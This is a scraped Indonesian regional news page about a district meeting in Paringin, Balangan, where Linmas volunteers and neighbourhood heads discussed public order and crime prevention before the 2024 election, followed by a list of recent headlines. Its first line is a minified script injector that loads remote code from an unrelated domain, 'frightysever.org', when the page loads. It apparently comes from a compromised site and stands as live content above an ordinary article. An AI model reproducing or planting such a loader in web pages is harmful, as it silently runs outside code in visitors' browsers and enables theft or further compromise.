(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Linmas dan RT se Kecamatan Paringin Dikumpulkan Bahas Ketertiban Umum


KANALKALIMANTAN.COM, PARINGIN – Memperkuat sinergitas menjaga ketentraman dan ketertiban umum, serta perlindungan masyarakat, Pemerintah Kecamatan Paringin menggelar rapat yang dihadiri Linmas dan RT se Kecamatan Paringin, Rabu (29/11/2023)

Camat Paringin, Renny Yudisthesia mengatakan, pentingnya kerjasama antara Linmas dan RT dalam menjaga keamanan dan ketertiban di wilayah kecamatan.

Camat Paringin meminta untuk mengaktifkan Poskamling yang ada di tingkat kelurahan maupun desa menjaga ketentraman dan ketertiban menjelang Pemilu 2024.

“Sinergi antara Linmas dan RT sangat penting untuk menciptakan lingkungan yang aman dan nyaman bagi masyarakat,” ujarnya.

Renny Yudisthesia menambahkan bahwa rapat koordinasi ini merupakan langkah konkret dalam meningkatkan peran serta masyarakat dalam menjaga keamanan dan ketertiban.

“Berbagai strategi dan langkah-langkah yang dapat dilakukan oleh Linmas dan RT untuk mengatasi berbagai permasalahan yang mungkin timbul di masyarakat,” harapnya.

Selain itu, dalam rapat koordinasi ini juga diadakan diskusi terkait upaya pencegahan dan penanggulangan tindak kriminalitas, penyalahgunaan narkoba, serta penanganan konflik sosial.

Bertujuan untuk memberikan pemahaman dan pengetahuan kepada Linmas dan RT dalam menghadapi situasi yang mungkin terjadi di masyarakat.

Rapat koordinasi dapat menghasilkan kesepakatan bersama antara Linmas dan RT dalam menjaga ketentraman dan ketertiban umum.

“Linmas dan RT melaksanakan tugas dan tanggung jawab lebih efektif dan efisien. Masyarakat pun diharapkan dapat merasakan manfaat dari upaya bersama dalam menjaga ketentraman dan ketertiban umum di wilayah masing-masing,” pungkasnya.(Kanalkalimantan.com/mcbalangan/adv)

Editor: kk


Muhammad Andi

Recent Posts

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

5 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

6 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

6 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

7 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

8 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

9 jam ago

This website uses cookies.